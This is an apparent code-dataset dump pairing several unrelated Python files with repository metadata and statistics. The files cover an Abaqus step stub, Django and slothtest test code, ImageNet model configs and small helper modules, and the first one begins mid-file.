            A Boolean specifying whether to accept the solution to an increment after the maximum
            number of iterations allowed have been completed, even if the equilibrium tolerances are
            not satisfied. The default value is OFF.Warning:You should set *noStop*=ON only in
            special cases when you have a thorough understanding of how to interpret the results.
        maintainAttributes
            A Boolean specifying whether to retain attributes from an existing step with the same
            name. The default value is False.
        useLongTermSolution
            A Boolean specifying whether to obtain the fully relaxed long-term elastic solution with
            time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
            viscoplasticity. The default value is OFF.
        convertSDI
            A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
            occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
            CONVERT_SDI_ON. The default value is PROPAGATED.

        Returns
        -------
        A StaticRiksStep object.

        Raises
        ------
        RangeError
        """
        super().__init__()
        # Stub: the real implementation is provided by the Abaqus kernel at runtime.
        pass

    def setValues(self, description: str = '', nlgeom: Boolean = OFF, adiabatic: Boolean = OFF,
                  maxLPF: float = None, nodeOn: Boolean = OFF, maximumDisplacement: float = 0,
                  dof: int = 0, region: Region = Region(),
                  timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
                  totalArcLength: float = 1, initialArcInc: float = None, minArcInc: float = None,
                  maxArcInc: float = None, matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
                  extrapolation: SymbolicConstant = LINEAR, fullyPlastic: str = '', noStop: Boolean = OFF,
                  useLongTermSolution: Boolean = OFF, convertSDI: SymbolicConstant = PROPAGATED):
        """This method modifies the StaticRiksStep object.

        Parameters
        ----------
        description
            A String specifying a description of the new step. The default value is an empty string.
        nlgeom
            A Boolean specifying whether to allow for geometric nonlinearity. The default value is
            OFF.
        adiabatic
            A Boolean specifying whether to perform an adiabatic stress analysis. The default value
            is OFF.
        maxLPF
            None or a Float specifying the maximum value of the load proportionality factor. The
            default value is None.
        nodeOn
            A Boolean specifying whether to monitor the finishing displacement value at a node. The
            default value is OFF.
        maximumDisplacement
            A Float specifying the value of the total displacement (or rotation) at the node and
            degree of freedom that, if crossed during an increment, ends the step at the current
            increment. This argument is required when *nodeOn*=ON. The default value is 0.0.
        dof
            An Int specifying the degree of freedom being monitored. This argument is required when
            *nodeOn*=ON. The default value is 0.
        region
            A Region object specifying the vertex at which the finishing displacement value is being
            monitored. This argument is required when *nodeOn*=ON.
        timeIncrementationMethod
            A SymbolicConstant specifying the time incrementation method to be used. Possible values
            are FIXED and AUTOMATIC. The default value is AUTOMATIC.
        maxNumInc
            An Int specifying the maximum number of increments in a step. The default value is 100.
        totalArcLength
            A Float specifying the total load proportionality factor associated with the load in
            this step. The default value is 1.0.
        initialArcInc
            A Float specifying the initial load proportionality factor. The default value is the
            total load proportionality factor for the step.
        minArcInc
            A Float specifying the minimum arc length increment allowed. The default value is the
            smaller of the suggested initial load proportionality factor or 10−5 times the total
            load proportionality factor for the step.
        maxArcInc
            A Float specifying the maximum arc length increment allowed. The default value is the
            total load proportionality factor for the step.
        matrixStorage
            A SymbolicConstant specifying the type of matrix storage. Possible values are SYMMETRIC,
            UNSYMMETRIC, and SOLVER_DEFAULT. The default value is SOLVER_DEFAULT.
        extrapolation
            A SymbolicConstant specifying the type of extrapolation to use in determining the
            incremental solution for a nonlinear analysis. Possible values are NONE, LINEAR, and
            PARABOLIC. The default value is LINEAR.
        fullyPlastic
            A String specifying the name of the region being monitored for fully Plastic behavior.
            The default value is an empty string.
        noStop
            A Boolean specifying whether to accept the solution to an increment after the maximum
            number of iterations allowed have been completed, even if the equilibrium tolerances are
            not satisfied. The default value is OFF.Warning:You should set *noStop*=ON only in
            special cases when you have a thorough understanding of how to interpret the results.
        useLongTermSolution
            A Boolean specifying whether to obtain the fully relaxed long-term elastic solution with
            time-domain viscoelasticity or the long-term elastic-Plastic solution for two-layer
            viscoplasticity. The default value is OFF.
        convertSDI
            A SymbolicConstant specifying whether to force a new iteration if severe discontinuities
            occur during an iteration. Possible values are PROPAGATED, CONVERT_SDI_OFF, and
            CONVERT_SDI_ON. The default value is PROPAGATED.

        Raises
        ------
        RangeError
        """
        # Stub: the real implementation is provided by the Abaqus kernel at runtime.
        pass
| 49.738971
| 130
| 0.697834
| 3,128
| 27,058
| 6.006074
| 0.092072
| 0.030926
| 0.063076
| 0.071486
| 0.818598
| 0.77708
| 0.752009
| 0.728323
| 0.71805
| 0.717305
| 0
| 0.003086
| 0.257558
| 27,058
| 543
| 131
| 49.830571
| 0.931903
| 0.745177
| 0
| 0.126582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025316
| false
| 0.025316
| 0.202532
| 0
| 0.759494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9d283bf91c893390124f6f8f26727b1eab86c82d
| 477
|
py
|
Python
|
tests/decorators.py
|
zvolsky/django-smoke-tests
|
049a6b92013c78f44c5ec9cb55d9978f391af3d7
|
[
"MIT"
] | 17
|
2017-12-04T15:18:16.000Z
|
2021-04-22T11:32:25.000Z
|
tests/decorators.py
|
zvolsky/django-smoke-tests
|
049a6b92013c78f44c5ec9cb55d9978f391af3d7
|
[
"MIT"
] | 19
|
2017-12-28T15:17:46.000Z
|
2022-03-30T12:38:16.000Z
|
tests/decorators.py
|
zvolsky/django-smoke-tests
|
049a6b92013c78f44c5ec9cb55d9978f391af3d7
|
[
"MIT"
] | 8
|
2017-12-28T12:31:09.000Z
|
2021-11-01T15:28:23.000Z
|
from functools import wraps
def decorator_without_functools_wraps(f):
    """Restrict *f* to superusers, deliberately WITHOUT functools.wraps.

    Because the metadata is not copied, the returned callable keeps the
    name ``wrapper`` — this is the fixture's observable property.
    """
    def wrapper(request, *args, **kwargs):
        if request.user.is_superuser:
            return f(request, *args, **kwargs)
        raise Exception
    return wrapper
def decorator_with_functools_wraps(f):
    """Restrict *f* to superusers, copying *f*'s metadata via functools.wraps."""
    @wraps(f)
    def wrapper(request, *args, **kwargs):
        if request.user.is_superuser:
            return f(request, *args, **kwargs)
        raise Exception
    return wrapper
| 25.105263
| 42
| 0.656184
| 58
| 477
| 5.258621
| 0.362069
| 0.144262
| 0.222951
| 0.104918
| 0.727869
| 0.727869
| 0.727869
| 0.727869
| 0.727869
| 0.727869
| 0
| 0
| 0.249476
| 477
| 18
| 43
| 26.5
| 0.851955
| 0
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.071429
| 0
| 0.642857
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9d2fad7e81e403963335945f309cce8e109830b1
| 2,545
|
py
|
Python
|
slothtest_tests/test.py
|
elegantwist/slothtest
|
0c5e5fa6f06c6089f6d1ac0e667d33abeda989bf
|
[
"MIT"
] | 12
|
2019-02-04T09:13:09.000Z
|
2019-04-17T07:02:54.000Z
|
slothtest_tests/test.py
|
elegantwist/slothtest
|
0c5e5fa6f06c6089f6d1ac0e667d33abeda989bf
|
[
"MIT"
] | null | null | null |
slothtest_tests/test.py
|
elegantwist/slothtest
|
0c5e5fa6f06c6089f6d1ac0e667d33abeda989bf
|
[
"MIT"
] | null | null | null |
import pytest
import os
import pandas as pd
from slothtest import watchme
from slothtest import slothwatcher
class ClassForTesting:
debugging = 99
def __init__(self, dd=0):
self.debugging = dd
@watchme()
def im_a_function_for_testing(self, d_table=None, vv=1):
for i, row in d_table.iterrows():
d_table['value'][i] = row['value'] * 10
return d_table, vv
@watchme()
def im_another_function_for_testing(d_table=None, vv=1):
for i, row in d_table.iterrows():
d_table['value'][i] = row['value'] * 10
return d_table, vv
def test_classmethod():
dirname = os.path.dirname(__file__)
d_data = [{'column': 1, 'value': 1},
{'column': 2, 'value': 2},
{'column': 3, 'value': 4}]
d_table = pd.DataFrame(d_data)
slothwatcher.start()
fn = ClassForTesting(12).im_a_function_for_testing(d_table, 2)
assert slothwatcher.dump_counter == 1
assert len(slothwatcher.data_watch_dump) == 1
assert len(slothwatcher.data_watch_dump[0]['function']) > 0
assert len(slothwatcher.data_watch_dump[0]['arguments']) == 3
assert len(slothwatcher.data_watch_dump[0]['results']) == 2
assert slothwatcher.data_watch_dump[0]['function']['class_name'] == 'ClassForTesting'
assert slothwatcher.data_watch_dump[0]['function']['function_name'] == 'im_a_function_for_testing'
assert slothwatcher.data_watch_dump[0]['function']['scope_name'] == 'test'
slothwatcher.stop()
assert os.path.isfile(os.path.join(dirname, slothwatcher.session_id + '.zip'))
def test_function():
dirname = os.path.dirname(__file__)
d_data = [{'column': 1, 'value': 1},
{'column': 2, 'value': 2},
{'column': 3, 'value': 4}]
d_table = pd.DataFrame(d_data)
slothwatcher.start()
fn = im_another_function_for_testing(d_table, 2)
assert slothwatcher.dump_counter == 1
assert len(slothwatcher.data_watch_dump) == 1
assert len(slothwatcher.data_watch_dump[0]['function']) > 0
assert len(slothwatcher.data_watch_dump[0]['arguments']) == 2
assert len(slothwatcher.data_watch_dump[0]['results']) == 2
assert slothwatcher.data_watch_dump[0]['function']['class_name'] == ''
assert slothwatcher.data_watch_dump[0]['function']['function_name'] == 'im_another_function_for_testing'
assert slothwatcher.data_watch_dump[0]['function']['scope_name'] == 'test'
slothwatcher.stop()
assert os.path.isfile(os.path.join(dirname, slothwatcher.session_id + '.zip'))
| 29.593023
| 108
| 0.670334
| 342
| 2,545
| 4.719298
| 0.192982
| 0.138786
| 0.182156
| 0.216853
| 0.848823
| 0.828996
| 0.828996
| 0.806691
| 0.806691
| 0.806691
| 0
| 0.022607
| 0.183104
| 2,545
| 85
| 109
| 29.941176
| 0.753728
| 0
| 0
| 0.618182
| 0
| 0
| 0.131631
| 0.022004
| 0
| 0
| 0
| 0
| 0.327273
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.254545
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9d42dba2e36da3490c524ac95a75b46194999b80
| 108
|
py
|
Python
|
utils/get_time.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
utils/get_time.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
utils/get_time.py
|
ChrissisCodeXD/Hikari-TestProject
|
236c8fc9081172d9edff6d629e5d11c5abe64205
|
[
"MIT"
] | null | null | null |
import datetime, pytz
def get_time():
return datetime.datetime.now(tz=pytz.timezone('Europe/Berlin'))
| 18
| 67
| 0.740741
| 15
| 108
| 5.266667
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12037
| 108
| 5
| 68
| 21.6
| 0.831579
| 0
| 0
| 0
| 0
| 0
| 0.12037
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
19de8e324ff772ee03cacfddc8dfae3888e7bcd1
| 17,887
|
py
|
Python
|
vision/image_classification/configs/configs.py
|
pedro-abundio-wang/image-classification
|
952719d7561b9998add0daf71d61e55cb6103eaf
|
[
"Apache-2.0"
] | null | null | null |
vision/image_classification/configs/configs.py
|
pedro-abundio-wang/image-classification
|
952719d7561b9998add0daf71d61e55cb6103eaf
|
[
"Apache-2.0"
] | null | null | null |
vision/image_classification/configs/configs.py
|
pedro-abundio-wang/image-classification
|
952719d7561b9998add0daf71d61e55cb6103eaf
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python3
# ==============================================================================
"""Configuration utils for image classification experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import dataclasses
from vision.image_classification import dataset_factory
from vision.image_classification.configs import base_configs
from vision.image_classification.alexnet import alexnet_config
from vision.image_classification.resnet import resnet_config
from vision.image_classification.inception import inception_config
from vision.image_classification.vgg import vgg_config
from vision.image_classification.squeeze import squeeze_config
from vision.image_classification.mobile import mobilenet_config
@dataclasses.dataclass()
class AlexNetImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train alexnet on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = alexnet_config.AlexNetModelConfig()
@dataclasses.dataclass
class ResNet18ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet18 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet18ModelConfig()
@dataclasses.dataclass
class ResNet50ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet50 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet50ModelConfig()
@dataclasses.dataclass
class InceptionV1ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet-50 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = inception_config.GooglenetModelConfig()
@dataclasses.dataclass
class ResNet18V2ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet18v2 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet18V2ModelConfig()
@dataclasses.dataclass
class ResNet50V2ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train resnet50v2 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = resnet_config.ResNet50V2ModelConfig()
@dataclasses.dataclass()
class Vgg16ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train Vgg16 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = vgg_config.Vgg16ModelConfig()
@dataclasses.dataclass()
class Vgg19ImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train Vgg19 on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = vgg_config.Vgg19ModelConfig()
@dataclasses.dataclass
class SqueezeNetImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train SqueezeNet on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = squeeze_config.SqueezeNetModelConfig()
@dataclasses.dataclass()
class MobileNetImagenetConfig(base_configs.ExperimentConfig):
"""Base configuration to train mobilenet on ImageNet."""
export: base_configs.ExportConfig = base_configs.ExportConfig()
runtime: base_configs.RuntimeConfig = base_configs.RuntimeConfig()
train_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='train',
one_hot=False,
mean_subtract=True,
standardize=True)
validation_dataset: dataset_factory.DatasetConfig = \
dataset_factory.ImageNetConfig(split='validation',
one_hot=False,
mean_subtract=True,
standardize=True)
train: base_configs.TrainConfig = base_configs.TrainConfig(
resume_checkpoint=True,
epochs=90,
steps=None,
callbacks=base_configs.CallbacksConfig(enable_checkpoint_and_export=True,
enable_tensorboard=True),
metrics=['accuracy', 'top_5'],
time_history=base_configs.TimeHistoryConfig(log_steps=100),
tensorboard=base_configs.TensorboardConfig(track_lr=True,
write_model_weights=False))
evaluation: base_configs.EvalConfig = base_configs.EvalConfig(
epochs_between_evals=1,
steps=None)
model: base_configs.ModelConfig = mobilenet_config.MobileNetModelConfig()
def get_config(model: str, dataset: str) -> base_configs.ExperimentConfig:
"""Given model and dataset names, return the ExperimentConfig."""
dataset_model_config_map = {
'imagenet': {
'alexnet': AlexNetImagenetConfig(),
'resnet18': ResNet18ImagenetConfig(),
'resnet50': ResNet50ImagenetConfig(),
'inceptionV1': InceptionV1ImagenetConfig(),
'resnet18v2': ResNet18V2ImagenetConfig(),
'resnet50v2': ResNet50V2ImagenetConfig(),
'vgg16': Vgg16ImagenetConfig(),
'vgg19': Vgg19ImagenetConfig(),
'squeeze': SqueezeNetImagenetConfig(),
'mobile': MobileNetImagenetConfig(),
}
}
try:
return dataset_model_config_map[dataset][model]
except KeyError:
if dataset not in dataset_model_config_map:
raise KeyError('Invalid dataset received. Received: {}. Supported '
'datasets include: {}'.format(dataset, ', '.join(dataset_model_config_map.keys())))
raise KeyError('Invalid model received. Received: {}. Supported models for'
'{} include: {}'.format(model, dataset, ', '.join(dataset_model_config_map[dataset].keys())))
| 50.528249
| 116
| 0.613854
| 1,517
| 17,887
| 6.963085
| 0.090969
| 0.137461
| 0.043548
| 0.064376
| 0.822683
| 0.802802
| 0.796743
| 0.748462
| 0.748462
| 0.748462
| 0
| 0.01179
| 0.30771
| 17,887
| 353
| 117
| 50.671388
| 0.841234
| 0.039973
| 0
| 0.825397
| 0
| 0
| 0.029866
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003175
| false
| 0
| 0.038095
| 0
| 0.298413
| 0.003175
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c2098c3f86f8a565346738dc2270bf0d01ba9106
| 208
|
py
|
Python
|
core/textsummarize.py
|
tonymazn/cs410
|
6abcd5762a1e5b131220651d2a82e6fac29b55fe
|
[
"Apache-2.0"
] | null | null | null |
core/textsummarize.py
|
tonymazn/cs410
|
6abcd5762a1e5b131220651d2a82e6fac29b55fe
|
[
"Apache-2.0"
] | null | null | null |
core/textsummarize.py
|
tonymazn/cs410
|
6abcd5762a1e5b131220651d2a82e6fac29b55fe
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from string import punctuation
from .summarizer import *
def get_summary(text, count, algorithm_name):
return convert_to_text(get_summary_result(text, count, algorithm_name))
| 18.909091
| 75
| 0.75
| 28
| 208
| 5.321429
| 0.678571
| 0.134228
| 0.241611
| 0.295302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005618
| 0.144231
| 208
| 10
| 76
| 20.8
| 0.831461
| 0.100962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
dfe86162496523bf90e46ab022930a12cdc8b8d1
| 102
|
py
|
Python
|
eggdriver/news/__init__.py
|
PythonForChange/eggdriver
|
bcf1da6dcb2a8daf3144c7af8d1d04f8844be2fc
|
[
"MIT"
] | 3
|
2021-09-25T01:22:31.000Z
|
2021-11-28T23:25:46.000Z
|
eggdriver/news/__init__.py
|
PythonForChange/eggdriver
|
bcf1da6dcb2a8daf3144c7af8d1d04f8844be2fc
|
[
"MIT"
] | null | null | null |
eggdriver/news/__init__.py
|
PythonForChange/eggdriver
|
bcf1da6dcb2a8daf3144c7af8d1d04f8844be2fc
|
[
"MIT"
] | null | null | null |
from eggdriver.news.app import *
from eggdriver.news.config import *
from eggdriver.news.news import *
| 34
| 35
| 0.803922
| 15
| 102
| 5.466667
| 0.4
| 0.47561
| 0.621951
| 0.560976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107843
| 102
| 3
| 36
| 34
| 0.901099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a051c3240f7f97b08d6062627ce105d6ae0f96dd
| 144
|
py
|
Python
|
app/tempBerry/smarthome/models/__init__.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 2
|
2019-07-16T19:09:50.000Z
|
2020-01-03T09:06:46.000Z
|
app/tempBerry/smarthome/models/__init__.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | null | null | null |
app/tempBerry/smarthome/models/__init__.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 1
|
2020-02-09T22:46:05.000Z
|
2020-02-09T22:46:05.000Z
|
from tempBerry.smarthome.models.models import *
from tempBerry.smarthome.models.base import *
from tempBerry.smarthome.models.handlers import *
| 36
| 49
| 0.833333
| 18
| 144
| 6.666667
| 0.388889
| 0.325
| 0.55
| 0.7
| 0.566667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 144
| 3
| 50
| 48
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
